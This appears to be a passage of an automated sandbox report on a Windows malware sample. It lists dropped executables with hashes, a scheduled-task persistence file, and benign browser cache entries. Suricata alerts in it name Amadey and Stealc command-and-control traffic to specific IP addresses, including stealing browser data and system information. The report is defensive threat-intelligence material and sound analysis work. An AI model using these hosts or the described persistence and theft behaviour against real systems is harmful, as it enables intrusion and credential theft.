SHA-512:	FC94A545729094DE3685B2C3F98CCE9886CFE59D4AB107573958E5B7D240A857B48D7CF8B85938974939DE1E1322CDC690EE4CA5AE3C8E9DA734FF65156965A9
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/E324A7F1015F31AE2E8B84D5194B7442",.. "id": "E324A7F1015F31AE2E8B84D5194B7442",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/E324A7F1015F31AE2E8B84D5194B7442"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/5E5CEBEF5A508A81D457052E80DB3E4A",.. "id": "5E5CEBEF5A508A81D457052E80DB3E4A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/5E5CEBEF5A508A81D457052E80DB3E4A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1883648
Entropy (8bit):	7.947912844145747
Encrypted:	false
SSDEEP:	24576:go2wo7seKU9S4ryloddm1xVJBT/M0m9IWnbqt2FyfqOG9i9PYTse73ppIbBz5kwO:gah83Vs1xVJV/M0INnGmMGg9gTs0pq
MD5:	7366C5E55B0B2823487B875D11C5BE89
SHA1:	49C6F427943438D44E2C0A213F8D19F82781DCEA
SHA-256:	31A2FBFCBF475D0D157ED8CF81C399DD6E526362600C4A5AB6570279CC773661
SHA-512:	3264AF12D491DD19A2E03B83C4E9459FC66132D91AEBF40CFA4B4976062E69B610A8F45E05C0EA3C10A8EB531396B3D45D0832A55C4D2E09D847F4E96A8164F9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Pg..............................J...........@...........................J...........@.................................\0..p.... .......................1...................................................................................... . .........2..................@....rsrc........ .......B..............@....idata .....0.......F..............@... ..*..@.......H..............@...wdzyrihu.P... 0..N...J..............@...vkjitssl.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1883648
Entropy (8bit):	7.947912844145747
Encrypted:	false
SSDEEP:	24576:go2wo7seKU9S4ryloddm1xVJBT/M0m9IWnbqt2FyfqOG9i9PYTse73ppIbBz5kwO:gah83Vs1xVJV/M0INnGmMGg9gTs0pq
MD5:	7366C5E55B0B2823487B875D11C5BE89
SHA1:	49C6F427943438D44E2C0A213F8D19F82781DCEA
SHA-256:	31A2FBFCBF475D0D157ED8CF81C399DD6E526362600C4A5AB6570279CC773661
SHA-512:	3264AF12D491DD19A2E03B83C4E9459FC66132D91AEBF40CFA4B4976062E69B610A8F45E05C0EA3C10A8EB531396B3D45D0832A55C4D2E09D847F4E96A8164F9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Pg..............................J...........@...........................J...........@.................................\0..p.... .......................1...................................................................................... . .........2..................@....rsrc........ .......B..............@....idata .....0.......F..............@... ..*..@.......H..............@...wdzyrihu.P... 0..N...J..............@...vkjitssl.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Documents\JJECFIECBG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3191808
Entropy (8bit):	6.684358974572999
Encrypted:	false
SSDEEP:	49152:fMv3wY2bOjNNcJ9B4R1gcJrcyyh+0I5T3iczkc9Gzq1f:0PgbiNN2fUgcJrcyyhtIZScz3I
MD5:	5CC1E2DF8F03CC33A15DDE12361499CF
SHA1:	7C69C2D8882915CF9DAC2574CDB52B7510FEB46C
SHA-256:	C9DE766681ADA475273559581AAF0DAA3D4B855D4EF9D4BF30F25C99171351E9
SHA-512:	214CFF1838C09D951534BD14B5C65C9164CDAA55FCE85DA01E76A0ED730D0EB10D0CE80B1BBDC0C6892F3E252E2623D5ABF7E58229826434906FAE8412241C69
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0.......0...@.................................W...k.............................0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...akyzlcoy..*.......).................@...zjlmqufv......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\JJECFIECBG.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3191808
Entropy (8bit):	6.684358974572999
Encrypted:	false
SSDEEP:	49152:fMv3wY2bOjNNcJ9B4R1gcJrcyyh+0I5T3iczkc9Gzq1f:0PgbiNN2fUgcJrcyyhtIZScz3I
MD5:	5CC1E2DF8F03CC33A15DDE12361499CF
SHA1:	7C69C2D8882915CF9DAC2574CDB52B7510FEB46C
SHA-256:	C9DE766681ADA475273559581AAF0DAA3D4B855D4EF9D4BF30F25C99171351E9
SHA-512:	214CFF1838C09D951534BD14B5C65C9164CDAA55FCE85DA01E76A0ED730D0EB10D0CE80B1BBDC0C6892F3E252E2623D5ABF7E58229826434906FAE8412241C69
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0.......0...@.................................W...k.............................0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...akyzlcoy..*.......).................@...zjlmqufv......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Documents\JJECFIECBG.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4076944014292425
Encrypted:	false
SSDEEP:	6:QFVXUhXUEZ+lX1CGdKUe6tE9+AQy0ldct0:E4Q1CGAFD9+nV+t0
MD5:	A3175B07A6AE9258B1AA3FC479F1D277
SHA1:	8B2A5A2FC0B0E25D5CFD54A93A49BBBBFCF30400
SHA-256:	48A2863F5D20A016D8191ED588A7390098DEBC56C0100350A019B2EF0B4A18B0
SHA-512:	E9B60C239830D5A3E9F503DBA4CDEFA0BECFF72180A89ADDF38EAA93A9FD8A2CB49E4AF1D724F8C0763B94411A1565AE17B26F6E615A4262DAAFD87BBB9D5586
Malicious:	false
Preview:	......,D...L.W.G...CF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................!.@3P.........................

Chrome Cache Entry: 181

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	179299
Entropy (8bit):	5.547369532089825
Encrypted:	false
SSDEEP:	3072:eEBR1XAUw+9+in7oNRFhJpGOa9VMgoeSWInJ+LBIwK555ypuq/dP/JlpNMWzeAx+:eKR1tw+9+i7GFhJcOa/MgoeSWIJ+LBI/
MD5:	E51B78D04BF7FEADF2B7281088079FD5
SHA1:	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6
SHA-256:	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
SHA-512:	5377F671601862CBB506C1B33AA5F5ACAC2C451998C8A1A8E8C6754D2D11C96484483C081FB3A0407BAF1329D70F41ADE5CAB27993B6FA631384243BFC890813
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv_QWZGpfkLjSgGX6lavnloO0T86g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 182

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (788)
Category:	downloaded
Size (bytes):	793
Entropy (8bit):	5.156676291962408
Encrypted:	false
SSDEEP:	24:vj+PgZ9+BHslgT9lCuABuoB7HHHHHHHYqmffffffo:bcg2KlgZ01BuSEqmffffffo
MD5:	913634E679882DCCB375D9A0F71662E1
SHA1:	93A899441864EB3EFB9CD133406AD84B6010AB32
SHA-256:	95299A2850F3D4D06F85C04D4B97C2094C51C0293B2D21813CF99ABBB1E5526C
SHA-512:	5F6DD9DF472EB35F7D15633F950A5C8EE4AAB6587D0881327DA39C1209B37AAAFDC9C42CF11A737E91AAA49C424317821D2A6CC8A9B2FBB798DED6D21A77480C
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["fortnite wrapped","ironman tournament brackets","super micro nasdaq extension stock price","will there be arcane season 3","turkey saint nicholas tomb","storm darragh weather warnings","piaa football championships","ripple xrp news"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 183

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 184

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134277
Entropy (8bit):	5.441870384055781
Encrypted:	false
SSDEEP:	3072:f0kX33ov7GsG688fJbk/5xnsgLWjwR2i6o:fv3lr6t2/5xnsgawR8o
MD5:	433B5100F9219D3F4AAE05A0C3EEDF53
SHA1:	A3F05D03744EDE3BBFE41DF76C50A356681C680D
SHA-256:	3F81A19F0D1C3D74C022C3DA904B09F8CED37B90C1A963B50853670B454D512D
SHA-512:	945C530945CA0C21770AFA8F22F1E2A81004226A67D4C5B4BDC927D482720726AEC17B2F31D89127933B2A22FDD9A899385C5F8711C9273C6292BEE582EBCBC9
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 185

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 186

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945041065305383
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'787'904 bytes
MD5:	8f8df73091164236b35ac3cad7969f87
SHA1:	ebf8688e3ab2e1cdf4b6822993e3e111cf8623ba
SHA256:	afd10002d57ad1cc0c4d7f195e9ed22d909d3774bdb65b0232f2f63cdbb70967
SHA512:	8a0a0aafb727e320c72dfa74da15ca67cd4ac5bcf99286927a4244ea99d5c38fd4adce6d65b878f64437c8deae0bc262ec602e6144fd10797bb8932ff0ae7453
SSDEEP:	24576:4ykhCHh8Ayt0yay6frGZ3dIUGD9xEoRqAjOSGF+iEHVi6MvZLUs+1Bli9uTR0hnA:exAmAKWD9OoIAh4yRUNUD1C9d3do
TLSH:	AF8533218174F445F5223F793232D0CF63AB7D07E9ECFBDA121D8D662A967A69213C90
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.\|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa8b000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB1C8800C2Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16800	fa30abfa496ee5a65a1b65aa1dcd765c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1ac	0x200	5062bfff3a4767d2d3f45cdf9b82a343	False	0.580078125	data	4.574691910327367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2a3000	0x200	3a92a2fb6d9bca58bbb3709cd5c55db3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jxsibylc	0x4ef000	0x19b000	0x19a400	f46d9ac866c31e61f58825833352bbce	False	0.9950356585161487	data	7.954664220739316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gaqfpirs	0x68a000	0x1000	0x400	be9b11ac26706450dc88c2ca7a835c5c	False	0.794921875	data	6.1718653281374385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x68b000	0x3000	0x2200	3122dc95ccdcce3d15a9fde8194a912d	False	0.006548713235294118	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x68910c	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-08T13:31:05.849028+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	50028	TCP
2024-12-08T13:31:18.645734+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49724	185.215.113.206	80	TCP
2024-12-08T13:31:19.096975+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49724	185.215.113.206	80	TCP
2024-12-08T13:31:19.225051+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.6	49724	TCP
2024-12-08T13:31:19.550171+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49724	185.215.113.206	80	TCP
2024-12-08T13:31:19.678500+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.6	49724	TCP
2024-12-08T13:31:21.000477+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49724	185.215.113.206	80	TCP
2024-12-08T13:31:21.722601+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49724	185.215.113.206	80	TCP
